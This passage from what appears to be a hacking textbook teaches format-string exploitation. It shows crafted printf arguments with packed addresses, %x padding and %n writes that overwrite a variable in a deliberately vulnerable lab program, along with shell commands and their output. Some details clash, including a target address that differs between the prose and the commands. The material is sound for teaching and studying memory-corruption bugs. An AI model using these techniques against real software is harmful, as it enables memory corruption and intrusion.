Graphics Programs Reference
In-Depth Information
The last
%x
format parameter uses 8 as the field width to standardize the
output. This is essentially reading a random DWORD from the stack, which
could output anywhere from 1 to 8 characters. Since the first overwrite puts
28 into test_val, using 150 as the field width instead of 8 should control the
least significant byte of
test_val
to
0xAA
.
Now for the next write. Another argument is needed for another
%x
format parameter to increment the byte count to 187, which is 0xBB in
decimal. This argument could be anything; it just has to be four bytes long
and must be located after the first arbitrary memory address of
0x08049754
.
Since this is all still in the memory of the format string, it can be easily
controlled. The word
JUNK
is four bytes long and will work fine.
After that, the next memory address to be written to,
0x08049755
, should
be put into memory so the second
%n
format parameter can access it. This
means the beginning of the format string should consist of the target mem-
ory address, four bytes of junk, and then the target memory address plus one.
But all of these bytes of memory are also printed by the format function,
thus incrementing the byte counter used for the
%n
format parameter. This is
getting tricky.
Perhaps we should think about the beginning of the format string ahead
of time. The goal is to have four writes. Each one will need to have a memory
address passed to it, and among them all, four bytes of junk are needed to
properly increment the byte counter for the
%n
format parameters. The first
%x
format parameter can use the four bytes found before the format string
itself, but the remaining three will need to be supplied data. For the entire
write procedure, the beginning of the format string should look like this:
0x08049794 0x08049795 0x08049796 0x08049797
94 97 04 08
JUNK
95 97 04 08
JUNK
96 97 04 08
JUNK
97 97 04 08
Let's give it a try.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x08049794 = 52 0x00000034
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xaa - 52 + 8"
$1 = 126
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa
r
eader@hacking:~/booksrc $
